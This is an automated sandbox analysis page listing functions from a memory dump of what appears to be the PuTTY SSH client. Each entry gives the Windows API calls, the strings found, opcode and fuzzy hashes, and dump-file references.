API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockMessageOpenSendUnlock
String ID:
API String ID: 4091238221-0
Opcode ID: 951538910bdbc72113cd30d488f82dc269d8cb1585c1cd1720b85c1cf1ffabcc
Instruction ID: a296c3cfe56c30e499c1adb655832a35029004df1e90939029a3ff49ef19ffa2
Opcode Fuzzy Hash: 951538910bdbc72113cd30d488f82dc269d8cb1585c1cd1720b85c1cf1ffabcc
Instruction Fuzzy Hash: 38219021F0914685FE559F6AED5473E6691BF58F95F198034CF0D86AB0DF3CA4858B00

Function 00007FF6BB2AAAF0 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 317comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00007FF6BB2AAB40
CoCreateInstance.OLE32 ref: 00007FF6BB2AABFF
CoCreateInstance.OLE32 ref: 00007FF6BB2AAC70

Strings

Recent Sessions, xrefs: 00007FF6BB2AADFD
Pageant.exe, xrefs: 00007FF6BB2AAE35

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CreateInstance
String ID: Pageant.exe$Recent Sessions
API String ID: 542301482-148644000
Opcode ID: 7dde4ad06f94e58ba722ff84eb97f0fa8fb844da0378d740b24b288f643abab2
Instruction ID: 5d77a5d60d3de32cf8231a460b5dc8dee2d89a694fd2e032361660302b655ab6
Opcode Fuzzy Hash: 7dde4ad06f94e58ba722ff84eb97f0fa8fb844da0378d740b24b288f643abab2
Instruction Fuzzy Hash: 6CE12832608A4682EB109B2AE55437EB7A1FF89B94F504432EB8E83774DF7DE545CB40

Function 00007FF6BB281160 Relevance: 12.3, APIs: 8, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5412766714560a4fbff42f61eca60b5f976890a9ac266f06ccb218d8818102f
Instruction ID: 5d79ef2ee36d715afd0874b760bf7e1f5fd29e7702801b4ef6c2cecd42dd4066
Opcode Fuzzy Hash: d5412766714560a4fbff42f61eca60b5f976890a9ac266f06ccb218d8818102f
Instruction Fuzzy Hash: C0C16B62E0869686FB249B2DAE557BD6790BF8C740F684035DB4EC26F5DE7CE841CB00

Function 00007FF6BB35DDF8 Relevance: 10.8, APIs: 7, Instructions: 286COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB35E22A

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 183414eea92ac05355f01f144efcc7a106660819817fb9335955ce3f47e8f072
Instruction ID: 7aaa9d29228537429020eca71a889191c84ae083c5686a7a8372d4606e9f572d
Opcode Fuzzy Hash: 183414eea92ac05355f01f144efcc7a106660819817fb9335955ce3f47e8f072
Instruction Fuzzy Hash: FBC1FF62A0C69A95EB60AB2AD4403BD77A0FF89B80F850131DB4E833B5CF7DE855C714

Function 00007FF6BB2BD150 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 210registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2C6460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C652D
Part of subcall function 00007FF6BB2C6460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6576

Part of subcall function 00007FF6BB2C6750: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00000000,00007FF6BB2BDAC6), ref: 00007FF6BB2C678D
Part of subcall function 00007FF6BB2C6750: RegQueryValueExA.ADVAPI32 ref: 00007FF6BB2C67D4

RegCloseKey.ADVAPI32 ref: 00007FF6BB2BD1E2
RegCloseKey.ADVAPI32 ref: 00007FF6BB2BD223
RegCloseKey.ADVAPI32 ref: 00007FF6BB2BD42F

Part of subcall function 00007FF6BB2C6840: RegSetValueExA.ADVAPI32 ref: 00007FF6BB2C6873

Strings

rsa, xrefs: 00007FF6BB2BD20D
Software\SimonTatham\PuTTY\SshHostKeys, xrefs: 00007FF6BB2BD1AC
%s@%d:, xrefs: 00007FF6BB2BD186

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Close$Value$Query$Create
String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys$rsa
API String ID: 306613542-1153710622
Opcode ID: f409c6af9f2dbabcd250491df0d28a4a6c5a720deabbcc0a770a656b35dfe07a
Instruction ID: e9e1a7231e7f285285784d2ca6d7ea5e41049eda4ef25b77e96a20bc6843f37b
Opcode Fuzzy Hash: f409c6af9f2dbabcd250491df0d28a4a6c5a720deabbcc0a770a656b35dfe07a
Instruction Fuzzy Hash: 4781B521F1D65242FA24A7196A513FE6690BF8DBC4F485531EF0EC73A6EE3DE5068340

Function 00007FF6BB359714 Relevance: 10.7, APIs: 7, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB353098: GetLastError.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530A7
Part of subcall function 00007FF6BB353098: FlsGetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530BC
Part of subcall function 00007FF6BB353098: SetLastError.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB353147

Part of subcall function 00007FF6BB353098: FlsSetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530DD

GetUserDefaultLCID.KERNEL32(00000000,00000092,?,?), ref: 00007FF6BB359884

Part of subcall function 00007FF6BB353098: FlsSetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB35310A
Part of subcall function 00007FF6BB353098: FlsSetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB35311B
Part of subcall function 00007FF6BB353098: FlsSetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB35312C

EnumSystemLocalesW.KERNEL32(00000000,00000092,?,?,00000000,?,?,00007FF6BB3488F9), ref: 00007FF6BB35986B
ProcessCodePage.LIBCMT ref: 00007FF6BB3598AE
IsValidCodePage.KERNEL32 ref: 00007FF6BB3598C0
IsValidLocale.KERNEL32 ref: 00007FF6BB3598D6
GetLocaleInfoW.KERNEL32 ref: 00007FF6BB359932
GetLocaleInfoW.KERNEL32 ref: 00007FF6BB35994E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 2591520935-0
Opcode ID: ae6017f7ffca846b62c8ed51e5b1960e5b6c0c466f05bc49023d1fe6e4180a22
Instruction ID: d81e1eabfea290f9dc86f1316771870af747749006a0df3c37581a9e1284201e
Opcode Fuzzy Hash: ae6017f7ffca846b62c8ed51e5b1960e5b6c0c466f05bc49023d1fe6e4180a22
Instruction Fuzzy Hash: 11716622B0860299FB519F68D8606FD23B8BF4DB48F444636CB0E936A5EF3CA845C754

Function 00007FF6BB2B0520 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32 ref: 00007FF6BB2B054E
FindFirstFileA.KERNEL32 ref: 00007FF6BB2B0573
FindNextFileA.KERNEL32 ref: 00007FF6BB2B05B1
FindClose.KERNEL32 ref: 00007FF6BB2B05BA
GetCurrentProcessId.KERNEL32 ref: 00007FF6BB2B05C0

Strings

\*, xrefs: 00007FF6BB2B055C

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Find$File$CloseCurrentDirectoryFirstNextProcessWindows
String ID: \*
API String ID: 1945953020-2355939697
Opcode ID: f2f9b6de610566d39f286ec67e61f68930c967612da7119efc67e4e31afaaf20
Instruction ID: 322c90fadd3e2402834f14c571a9e255a59c069676a22476d1198080c0952a25
Opcode Fuzzy Hash: f2f9b6de610566d39f286ec67e61f68930c967612da7119efc67e4e31afaaf20
Instruction Fuzzy Hash: C221CF2170864282EA259B29EA943BF6351BFCDBE0F504231DE5D87BE5DE3CD4068B01

Function 00007FF6BB2D6B00 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60libraryfileloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6BB2D6B58
FindFirstFileA.KERNEL32 ref: 00007FF6BB2D6B97
CloseHandle.KERNEL32 ref: 00007FF6BB2D6BA6

Strings

GetFileAttributesExA, xrefs: 00007FF6BB2D6B4E
kernel32.dll, xrefs: 00007FF6BB2D6B36
P, xrefs: 00007FF6BB2D6BB0

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressCloseFileFindFirstHandleProc
String ID: GetFileAttributesExA$P$kernel32.dll
API String ID: 3854970465-2903979390
Opcode ID: f4aba13d443b93aafd6aa3263d915f47cb73d6bc2b5e6b83988fa402c0b93324
Instruction ID: 659a781f0a4ea27282e9d8d14c7edb62c5e4733b41a2226dc3b84558ee8cac30
Opcode Fuzzy Hash: f4aba13d443b93aafd6aa3263d915f47cb73d6bc2b5e6b83988fa402c0b93324
Instruction Fuzzy Hash: 35219221A49A5241FA22DB5CBA507793391BF4CBA4F554331DA5D977B8DF3CE8068B00

Function 00007FF6BB2AA440 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

CreateFontA.GDI32 ref: 00007FF6BB2AA4F7
GetDC.USER32 ref: 00007FF6BB2AA502
SelectObject.GDI32 ref: 00007FF6BB2AA516
GetTextMetricsA.GDI32 ref: 00007FF6BB2AA529
ReleaseDC.USER32 ref: 00007FF6BB2AA548
DeleteObject.GDI32 ref: 00007FF6BB2AA556

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Object$CreateDeleteFontMetricsReleaseSelectText
String ID:
API String ID: 4134816134-0
Opcode ID: 69551d488096906496712d5f2c0061c1a6eff2d2e4d2870afeab42787d21d151
Instruction ID: f7de69afad7baf948a09e3d8ba6daea833b39ddcf29ccde5a9ec6f88e3c040bb
Opcode Fuzzy Hash: 69551d488096906496712d5f2c0061c1a6eff2d2e4d2870afeab42787d21d151
Instruction Fuzzy Hash: A8319E32A0824286FB649B19E55537EB791FF89B94F194138DA4E877A4CF7DD0458F00

Function 00007FF6BB354664 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6BB3546DD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6BB3546F5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6BB354730
IsDebuggerPresent.KERNEL32 ref: 00007FF6BB354769
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6BB354773
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6BB35477E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: c7e5754db025d4a90c51788674905033731d34135c3660df6a8cfa7fabe26499
Instruction ID: 327e8f461c6183c5587b461b3ec592251a2e44e25336c337e45d9aaea0407d64
Opcode Fuzzy Hash: c7e5754db025d4a90c51788674905033731d34135c3660df6a8cfa7fabe26499
Instruction Fuzzy Hash: ED319236618F8196DB60CF29E8402AE73A4FB89754F550235EB9D83BA9EF3CC545CB00

Function 00007FF6BB342E80 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 329COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6BB342EEA
memcpy_s.LIBCPMT ref: 00007FF6BB342F15

Strings

, xrefs: 00007FF6BB343048
MZx, xrefs: 00007FF6BB342E85

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: memcpy_s
String ID: $MZx
API String ID: 1502251526-1316729395
Opcode ID: 680b90cf97a9c7fb76d7a62705229292c2faa968d74e11d542b3937a122fd231
Instruction ID: 590ce28d465b344ae3f96f50b2ce207190d940d7e40ac4af1f1842ae32e615de
Opcode Fuzzy Hash: 680b90cf97a9c7fb76d7a62705229292c2faa968d74e11d542b3937a122fd231
Instruction Fuzzy Hash: D5C1F972B1968687D724CF5DE088A6AB791F798784F448235DB4E83B94DF3EE805CB00

Function 00007FF6BB36697C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6BB358588: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB3585BB

_get_daylight.LIBCMT ref: 00007FF6BB366A2A
_get_daylight.LIBCMT ref: 00007FF6BB366A3B
_get_daylight.LIBCMT ref: 00007FF6BB366A4C
GetTimeZoneInformation.KERNEL32(?,?,00000000,00000000,?,00007FF6BB366F58), ref: 00007FF6BB366A73

Strings

@, xrefs: 00007FF6BB3669C3

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _get_daylight$InformationTimeZone_invalid_parameter_noinfo
String ID: @
API String ID: 3482513350-2766056989
Opcode ID: dca634d6c3a5b7d34b55d3a849be1959882c23d7e5e2232627116e95c2f1e3cd
Instruction ID: fe3c889a525b2aae4e268e1d6511afe246917cbacb1ccab731ad36cc078bf005
Opcode Fuzzy Hash: dca634d6c3a5b7d34b55d3a849be1959882c23d7e5e2232627116e95c2f1e3cd
Instruction Fuzzy Hash: 93515332A0C6428AE724DF6AE8914A97761BB8D7D4F445135EB4EC3BBADF3CE4408744

Function 00007FF6BB2A882D Relevance: 7.7, APIs: 5, Instructions: 180windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A8FD3
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A8FF4
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A9027
SetDlgItemTextA.USER32 ref: 00007FF6BB2A9036
ChooseColorA.COMDLG32 ref: 00007FF6BB2A90E2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Item$MessageSend$ChooseColorText
String ID:
API String ID: 2403525919-0
Opcode ID: c817dabff143476df2b7c71046849934cd959a2b9ea5f7fa42b52ba8766c5e8c
Instruction ID: a074f26084f2454671fe6001f151b221178b64a07d0bbdfdda887c4cb0d642e2
Opcode Fuzzy Hash: c817dabff143476df2b7c71046849934cd959a2b9ea5f7fa42b52ba8766c5e8c
Instruction Fuzzy Hash: 3871A332A08A4289FB649B2AE5443BA77A1FB4DB84F544035DF8D87BA5CF3DE450CB40

Function 00007FF6BB2F9480 Relevance: 7.6, APIs: 5, Instructions: 77threadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32 ref: 00007FF6BB2F94D4
InitializeCriticalSection.KERNEL32 ref: 00007FF6BB2F9534
CreateEventA.KERNEL32 ref: 00007FF6BB2F9544
CreateThread.KERNEL32 ref: 00007FF6BB2F9583
CloseHandle.KERNEL32 ref: 00007FF6BB2F9591

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
String ID:
API String ID: 2660700835-0
Opcode ID: fe2a62694718fe40e23a01d8ab0726e6e88b1b264b7b4cf32e907f61084c9ec9
Instruction ID: 6262380974f87794f72e69ce38e6a84401a8b2eed174da95fb6927bfc7e8d872
Opcode Fuzzy Hash: fe2a62694718fe40e23a01d8ab0726e6e88b1b264b7b4cf32e907f61084c9ec9
Instruction Fuzzy Hash: 67316D32619A5186EB14CB29E8557AE73A4FB4D760F554239DB8E86BA0EF3CE045CB00

Function 00007FF6BB2F9120 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32 ref: 00007FF6BB2F9174
InitializeCriticalSection.KERNEL32 ref: 00007FF6BB2F91BD
CreateEventA.KERNEL32 ref: 00007FF6BB2F91CD
CreateThread.KERNEL32 ref: 00007FF6BB2F920C
CloseHandle.KERNEL32 ref: 00007FF6BB2F921A

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
